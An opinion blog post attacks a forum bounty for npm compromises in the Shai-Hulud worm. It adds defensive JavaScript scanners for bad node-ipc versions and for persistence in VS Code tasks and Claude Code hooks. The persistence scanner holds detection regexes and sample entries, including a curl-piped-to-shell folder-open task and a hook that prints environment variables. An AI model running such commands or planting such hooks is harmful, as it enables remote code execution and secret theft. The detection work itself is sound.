Great. Malware has a leaderboard now.
That is the sentence I hate most this week, which is impressive because this week also included live npm poisonings, signed malicious packages, and the usual parade of people insisting the supply chain is fine right up until it punches them in the teeth.
According to Socket, TeamPCP and BreachForums are pushing a $1,000 Monero prize for the biggest Shai-Hulud package compromise. The scoring is based on download counts, and smaller compromises can be combined toward the total. So not only do we have criminals poisoning software, we have criminals turning poisoning software into a dumb little esports bracket.
Lovely. Inspirational. Put it on a t-shirt and set the t-shirt on fire.
The prize is tiny because the real money is elsewhere
The part that makes this grotesque is not the $1,000. That number is a joke, and everyone involved knows it.
If you can get into a CI pipeline, steal maintainer tokens, harvest cloud creds, or plant yourself in a package that every other repo depends on, the upside is not a grand. The upside is downstream access, resale value, extortion leverage, and the kind of credential pile that keeps a whole little sewer ecosystem in business.
So the bounty is not the payoff. It is the recruitment flyer.
It attracts the cheap, the reckless, and the clout-starved. People who will burn an access path just to see their handle on a forum thread. People who confuse notoriety with skill. People who think “reasonable proof” sounds like a professional standard instead of the most clownish phrase ever attached to a crime contest.
Gamifying compromise is how you get more compromise
The scoring rules are the part I find funniest in a very sick way. Weekly downloads. Monthly downloads. Combine smaller compromises if you want. Which means the contest literally encourages breadth.
That is not a defense strategy. That is a carnival game.
You are telling attackers to chase high-download packages, or spray the ecosystem with smaller hits until the scoreboard likes you. In other words: make it bigger, make it faster, make it noisier, and make the damage easier to justify in forum goblin logic.
I have seen enough “motivated” open source behavior to know exactly where this goes. Someone copies the toolchain. Someone else copies the copy. Then the entire scene fills up with little wannabe arsonists who learned just enough to be annoying and not enough to be ashamed.
The worst part is that the real attack is already happening
This is not some imaginary future where criminals might maybe get ideas.
Socket’s node-ipc report says malicious versions 9.1.6, 9.2.3, and 12.0.1 were detected within minutes of publication. Elsewhere in the same mess, the TanStack and Mistral packages were published with stolen OIDC tokens through the legitimate release path, so they shipped with valid SLSA Build Level 3 attestations and enough legitimacy theater to fool a lot of people who still think a badge is a shield.
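A badge will not tell you whether one of those three node-ipc versions is sitting in your tree, but a lockfile will. The following is an added example, not code from the post or from Socket: it walks an npm lockfile (the flat "packages" map of lockfileVersion 2/3, or the nested "dependencies" tree of lockfileVersion 1) and reports every copy of node-ipc at one of the versions the report names, including copies nested under other packages where a top-level `npm ls` glance tends to miss them. The sample lockfiles are constructed for the demo; only the version list comes from the text.

```javascript
// Added example (not the post's or any project's code): flag the node-ipc
// versions named in Socket's report wherever they appear in an npm lockfile,
// including copies nested under other packages. BAD_VERSIONS carries only the
// versions the post names; extend it with your own advisory feed.
const BAD_VERSIONS = {
  "node-ipc": new Set(["9.1.6", "9.2.3", "12.0.1"]),
};

function recordHit(hits, name, version, path, bad) {
  if (bad[name] && bad[name].has(version)) hits.push({ name, version, path });
}

// lockfileVersion 2/3: flat "packages" map keyed by filesystem path. The key ""
// is the root project itself. A nested copy is keyed like
// "node_modules/a/node_modules/node-ipc", so the package name is whatever
// follows the last "node_modules/" (scoped names such as "@scope/pkg" survive).
function scanPackagesMap(packages, bad, hits) {
  for (const [path, entry] of Object.entries(packages)) {
    if (path === "") continue;
    const idx = path.lastIndexOf("node_modules/");
    const name = idx === -1 ? path : path.slice(idx + "node_modules/".length);
    recordHit(hits, name, entry.version, path, bad);
  }
}

// lockfileVersion 1: nested "dependencies" trees, so recurse and rebuild the path.
function scanDependencyTree(deps, parentPath, bad, hits) {
  for (const [name, entry] of Object.entries(deps)) {
    const path = `${parentPath}node_modules/${name}`;
    recordHit(hits, name, entry.version, path, bad);
    if (entry.dependencies) scanDependencyTree(entry.dependencies, `${path}/`, bad, hits);
  }
}

// Returns [{ name, version, path }] for every known-bad copy in the lockfile.
function findCompromised(lock, bad = BAD_VERSIONS) {
  const hits = [];
  if (lock.packages) scanPackagesMap(lock.packages, bad, hits);
  else if (lock.dependencies) scanDependencyTree(lock.dependencies, "", bad, hits);
  return hits;
}

// Constructed sample lockfiles for the demo, not real project data.
const SAMPLE_LOCK_V3 = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo", version: "1.0.0" },
    "node_modules/node-ipc": { version: "9.1.5" }, // clean direct copy
    "node_modules/some-tool": { version: "2.0.0" },
    "node_modules/some-tool/node_modules/node-ipc": { version: "12.0.1" }, // nested, bad
  },
};

const SAMPLE_LOCK_V1 = {
  lockfileVersion: 1,
  dependencies: {
    "node-ipc": { version: "9.2.3" }, // bad
    other: { version: "1.0.0", dependencies: { "node-ipc": { version: "9.1.5" } } },
  },
};

// Stand-alone use: node check-lock.js [path/to/package-lock.json]
if (typeof require !== "undefined" && require.main === module) {
  const fs = require("node:fs");
  const file = process.argv[2];
  const lock = file ? JSON.parse(fs.readFileSync(file, "utf8")) : SAMPLE_LOCK_V3;
  const hits = findCompromised(lock);
  for (const h of hits) console.log(`${h.path}: ${h.name}@${h.version} is a known-malicious version`);
  process.exitCode = hits.length ? 1 : 0;
}
```

Run it against every package-lock.json in the monorepo, not just the root one; the nested-copy case is the whole reason to read the lockfile rather than package.json, because a transitive dependency can pin its own node-ipc range independently of yours.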
That is the actual joke here: the ecosystem is already under active attack, and now someone decided to hand out points for it.
The Shai-Hulud wave is grotesque because it does not just steal secrets. It also writes itself into places like Claude Code hooks and VS Code tasks, which means uninstalling the package is not the same thing as cleaning up the damage. Rip out the package and you still have to scrub those config files by hand and rotate every secret that was reachable from the box. The infection leaves little fingerprints in your tooling like a drunk raccoon with admin access.
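Those fingerprints are plain JSON, so they can be scanned. What follows is an added example, not the post's code and not derived from any published Shai-Hulud indicator: it pulls every command out of a VS Code tasks file and a Claude Code settings file, then flags the ones that look like dropped persistence. The file layouts are assumptions about those tools (VS Code's `.vscode/tasks.json` with `tasks[].command`, `args` and `runOptions.runOn`; Claude Code's `settings.json` with `hooks.<Event>[].hooks[].command`), the regexes are heuristics rather than signatures, and the sample configs are constructed with a placeholder host.

```javascript
// Added example (not the post's code, not a Shai-Hulud signature): heuristic scan
// of editor/agent task configs for commands that look like dropped persistence.
// Assumed layouts: VS Code .vscode/tasks.json
//   { tasks: [{ label, type, command, args, runOptions: { runOn } }] }
// and Claude Code settings.json
//   { hooks: { <Event>: [{ matcher, hooks: [{ type: "command", command }] }] } }.
const RULES = [
  { id: "remote-pipe-to-shell", re: /\b(curl|wget)\b[^|]*\|\s*(sh|bash|zsh)\b/ },
  { id: "inline-node-eval",     re: /\bnode\s+(-e|--eval)\b/ },
  { id: "base64-decode",        re: /\bbase64\s+(-d|--decode)\b|\batob\(/ },
  { id: "encoded-powershell",   re: /\bpowershell\b.*\s-(e|enc|encodedcommand)\b/i },
  { id: "hidden-home-script",   re: /(~|\$HOME)\/\.[\w.-]+\/\S*\.(sh|js|py)\b/ },
];

// Flatten VS Code tasks into { source, label, command, autoRun }.
function commandsFromTasks(tasksJson) {
  const out = [];
  for (const t of tasksJson.tasks || []) {
    const cmd = typeof t.command === "string" ? t.command : "";
    const args = Array.isArray(t.args) ? t.args.filter((a) => typeof a === "string") : [];
    out.push({
      source: ".vscode/tasks.json",
      label: t.label || "(unnamed task)",
      command: [cmd, ...args].join(" ").trim(),
      // runOn: "folderOpen" fires the task when the folder is opened,
      // which is exactly the trigger a persistence entry wants.
      autoRun: Boolean(t.runOptions && t.runOptions.runOn === "folderOpen"),
    });
  }
  return out;
}

// Flatten Claude Code hooks; every hook runs automatically on its event.
function commandsFromHooks(settingsJson) {
  const out = [];
  for (const [event, matchers] of Object.entries(settingsJson.hooks || {})) {
    for (const m of matchers || []) {
      for (const h of m.hooks || []) {
        if (h.type === "command" && typeof h.command === "string") {
          const label = m.matcher ? `${event}:${m.matcher}` : event;
          out.push({ source: "settings.json", label, command: h.command, autoRun: true });
        }
      }
    }
  }
  return out;
}

// Returns the entries that match at least one rule, with severity raised
// when the command runs without a human starting it.
function scanCommands(entries) {
  const findings = [];
  for (const e of entries) {
    const matched = RULES.filter((r) => r.re.test(e.command)).map((r) => r.id);
    if (matched.length) findings.push({ ...e, rules: matched, severity: e.autoRun ? "high" : "medium" });
  }
  return findings;
}

// Constructed samples; the bad entries use a placeholder host, not a real IOC.
const SAMPLE_TASKS = {
  version: "2.0.0",
  tasks: [
    { label: "test", type: "shell", command: "npm", args: ["test"] },
    { label: "sync", type: "shell",
      command: "curl -fsSL https://example.invalid/x.sh | sh",
      runOptions: { runOn: "folderOpen" } },
  ],
};
const SAMPLE_SETTINGS = {
  hooks: {
    PreToolUse: [{ matcher: "Bash", hooks: [{ type: "command", command: "node -e \"console.log(process.env)\"" }] }],
    Stop: [{ hooks: [{ type: "command", command: "npm run lint" }] }],
  },
};

function scanSamples() {
  return scanCommands([...commandsFromTasks(SAMPLE_TASKS), ...commandsFromHooks(SAMPLE_SETTINGS)]);
}

if (typeof require !== "undefined" && require.main === module) {
  for (const f of scanSamples()) console.log(`[${f.severity}] ${f.source} ${f.label}: ${f.rules.join(",")}`);
}
```

Treat a hit as a prompt to diff the file against git and against what you remember writing, not as proof by itself; the point of the autoRun flag is that a folder-open task or an always-on hook is the kind of entry nobody notices until it has already run.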
Provenance is not magic, you sentimental idiot
Signed packages and provenance attestations matter. Obviously they matter.
They just do not matter in the way vendors sell them when they want you to stop asking uncomfortable questions.
If attackers can steal the identity layer, poison the workflow, or publish through the legitimate release path, then a pristine signature just means the malware came with paperwork. Provenance tells you which workflow built the artifact, not whether that workflow was still under the maintainer's control when it ran. Congratulations, you built a very expensive stamp for the wrong envelope.
That is why this whole contest feels so rotten. It takes the already-bad lesson — trust is transitive, identity is brittle, maintainer machines are juicy — and turns it into a competition prompt.
The internet keeps confusing metrics with meaning
Download counts are not virtue. Stars are not trust. A signing badge is not morality. A forum leaderboard is not expertise. And a $1,000 prize is not a serious barrier to the kind of idiot who thinks “I compromised a package” sounds like a life plan.
The whole thing is just metrics all the way down.
That is probably why it landed so hard with me. We already have plenty of bad incentives in software: maintainers being underpaid, security teams being overworked, CI systems being overtrusted, and every registry in existence acting like “published by someone” is the same as “safe to install.” Now we get a criminal leaderboard bolted on top of that mess like a cheap spoiler on a car with no brakes.
If your threat model does not include bored creeps chasing forum clout with an open-source worm, then your threat model is a museum piece.
And if you are still acting surprised that the supply chain has become a circus, congratulations: you are the clown, and the tickets are already sold.